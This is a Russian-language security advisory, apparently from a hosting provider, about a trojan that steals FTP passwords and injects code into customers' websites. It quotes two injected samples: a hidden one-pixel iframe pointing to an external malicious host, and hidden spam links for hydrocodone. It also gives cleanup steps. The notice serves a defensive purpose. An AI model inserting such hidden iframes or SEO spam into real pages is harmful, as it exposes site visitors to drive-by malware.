Уважаемые абоненты!
Сообщаем, что в сети интернет появился новый тип вируса - Downloader.JS.Psyme.ct
(возможны другия названия), распространяющий себя через веб-сайты.
Схема заражения довольно проста: достаточно зайти на зараженный
сайт и при стандартных настройках безопасности браузера, вирус
автоматически установится на компьютере пользователя.
После этого он начинает отслеживать логины и пароли от FTP,
высылая их злоумышленникам. Собрав определенное количество паролей,
запускается специальная программа, которая подключается по FTP
к каждому сайту и встраивает в начало или конец страниц собственный
html-код, например, такой:
<iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0
src=http://qufo.info/xc/"></iframe><!--iframe width=1 height=1 border=0 frameborder=0 src="http://qufo.info/xc/"></iframe-->
или
<u style=display:none><a href="http://www.streetsmarts.us/projects/media/hydrocodone/buy-hydrocodone.html">buy hydrocodone</a>
<a href="http://www.streetsmarts.us/projects/media/hydrocodone/m367-hydrocodone.html">m367 hydrocodone</a></u>
Мы просим проверить свои сайты на предмет заражения. Для этого
достаточно п исходный код главной страницы на наличия постороннего текста.
В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:
1. Удалить вирусное содержимое со страниц вашего сайта.
2. Проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователец FTP.
Обращаем внимание, что в интернете можно встретить обсуждение данной проблемы,
где в качестве причин заражения указываются различные бесплатные "движки"
(phpBB и т.д.), либо наличие уязвимостей у хостинг-провайдеров.
Со своей стороны можем заверить, что вирус распространяется только способом,
описанным в этом письме, и его появление не связано с проблемами безопасности
на сервере.
